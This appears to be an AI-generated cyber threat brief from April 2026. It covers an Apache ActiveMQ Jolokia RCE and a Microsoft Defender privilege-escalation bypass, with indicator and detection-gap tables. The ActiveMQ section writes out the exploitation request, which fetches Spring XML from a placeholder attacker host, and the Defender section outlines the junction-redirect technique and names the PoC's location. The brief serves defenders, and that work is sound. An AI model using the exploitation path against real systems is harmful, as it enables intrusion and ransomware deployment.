Cyber Threat Brief — April 17 2026
⚠️ This report is AI-generated. Always validate findings.
1. Apache ActiveMQ Jolokia RCE — CVE-2026-34197
TL;DR: Authenticated (or unauth on 6.0.x–6.1.1) RCE via ActiveMQ’s Jolokia API lets attackers fetch remote Spring XML configs and exec OS commands. CISA KEV added April 16; ransomware and cryptominer deployment observed ITW.
What’s New:
- Exploitation path:
POST /api/jolokia/→addNetworkConnectorwithvm://URI containingbrokerConfig=xbean:http://<attacker>/evil.xml→ Spring XMLResourceXmlApplicationContextinstantiates beans (e.g.,Runtime.exec()) before validation → RCE on broker JVM. - Affected: ActiveMQ Classic 5.18.0–5.18.3 and 6.0.0–6.0.2. On 6.0.0–6.1.1 Jolokia is unauthenticated due to CVE-2024-32114 — no creds needed.
- Patched in 5.19.4 and 6.2.3. CISA KEV deadline: May 6, 2026.
- ITW: multiple threat groups deploying ransomware, cryptominers, and web shells post-exploitation since early April. DFIR Report documents full kill chain from initial access → credential dumping → lateral movement → ransomware.
- Horizon3.ai PoC and detailed write-up published; Metasploit module expected imminently.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
POST /api/jolokia/ with addNetworkConnector in body | HTTP request | T1190 | WAF, reverse proxy, ActiveMQ jetty.log | Block/Alert |
vm:// URI with brokerConfig=xbean:http in broker logs | Log entry | T1190 | ActiveMQ activemq.log | Alert — exploitation indicator |
| Outbound HTTP from ActiveMQ Java process to unexpected hosts (fetching Spring XML) | Network | T1105 | Firewall, Zeek http.log, NDR | Alert |
Unexpected child processes of ActiveMQ Java process (/bin/sh, cmd.exe, powershell.exe) | Process chain | T1059.004 | Sysmon EID 1, EDR, 4688+CL | High-fidelity alert |
| Jolokia endpoint exposed without authentication (ports 8161, 61616) | Recon | T1190 | Shodan/Censys, ASM scan | Remediate — disable or restrict Jolokia |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No dedicated ActiveMQ Jolokia exploitation rule; write SPL for addNetworkConnector in web logs + Java child process spawning |
| Elastic | None | No rule for Jolokia API abuse; custom KQL for HTTP POST to /api/jolokia/ with brokerConfig keyword |
| Sigma | None | No rule yet; write web_activemq_jolokia_rce_cve_2026_34197.yml matching POST to Jolokia with addNetworkConnector |
Sources: Horizon3.ai Disclosure · CISA KEV Catalog · SecurityWeek · Help Net Security
2. RedSun Bypasses April Patch for Defender LPE — CVE-2026-33825
TL;DR: Chaotic Eclipse’s RedSun PoC exploits a different Defender mechanism (cloud-file rollback) that remains unpatched after April Patch Tuesday. Huntress SOC confirms ITW exploitation of BlueHammer, RedSun, and UnDefend chains — patch alone is insufficient.
What’s New:
- RedSun (published April 15) abuses Defender’s cloud-tag file restoration: when Defender detects a cloud-tagged malicious file, it rewrites the file to its original location without validating the target path → oplock + junction redirect → arbitrary SYSTEM-context file write to
C:\Windows\System32→ LPE to SYSTEM. - April 14 Patch Tuesday (Defender Platform 4.18.26030.3011) fixed BlueHammer but NOT RedSun — the cloud-file rollback path is a separate code path.
- Huntress SOC now observing active exploitation of all three Chaotic Eclipse tools (BlueHammer, RedSun, UnDefend) in real-world intrusions.
- PoC available at
github.com/Nightmare-Eclipse/RedSun; EICAR test file embedded in PoC binary (some AV detect the PoC itself, but researcher demonstrated encrypted variant evading detection). - Expected fix: Defender Platform ≥ 4.18.26050.3011; no ETA from Microsoft.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
MsMpEng.exe writing to C:\Windows\System32 outside normal signature update paths | File write | T1574.002 | Sysmon EID 11 (FileCreate), EDR file telemetry | Alert — RedSun exploitation indicator |
Junction/symlink creation in C:\ProgramData\Microsoft\Windows Defender\ targeting System32 | File system | T1547.009 | Sysmon EID 11, USN Journal | Alert |
cldapi.dll operations by Defender process with oplock on non-cloud files | API call | T1574.002 | ETW Microsoft-Windows-CloudFiles, EDR kernel callbacks | Hunt |
| Rapid Defender scan → cloud verdict → file restore sequence in Defender operational log | Event sequence | T1574.002 | Microsoft-Windows-Windows Defender/Operational EID 1116→1117→1121 | Correlate — abnormal restore-to-System32 path |
| RedSun PoC binary hash (check VirusTotal for current samples) | File hash | T1588.005 | EDR, AV | Block known samples |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | SAM Database File Access Attempt (adjacent) | No rule for Defender cloud-file rollback abuse; need custom SPL for MsMpEng file writes to System32 |
| Elastic | None | No rule for Defender-mediated arbitrary file write |
| Sigma | technoherder BlueHammerFix repo (7 rules) | BlueHammer rules cover ~60% of the chain; RedSun-specific cloud-file rollback path not yet covered — write win_defender_cloud_rollback_hijack.yml |
Sources: BleepingComputer · Cybernews · CybersecurityNews · Chaotic Eclipse Blog
Status Updates
- CVE-2026-33827 (Windows TCP/IP IPv6+IPSec RCE): No public PoC yet; continue to prioritize patching IPSec-enabled hosts. Monitor Talos for Snort SID release. Original brief.
- CVE-2026-34621 (Adobe Acrobat/Reader Prototype Pollution): ITW exploitation ongoing; CISA KEV deadline May 4; APSB26-43 patch available. Original brief.
- CVE-2026-21643 (Fortinet FortiClient EMS SQLi): CISA KEV deadline passed yesterday (April 16); verify remediation status on exposed instances. Original brief.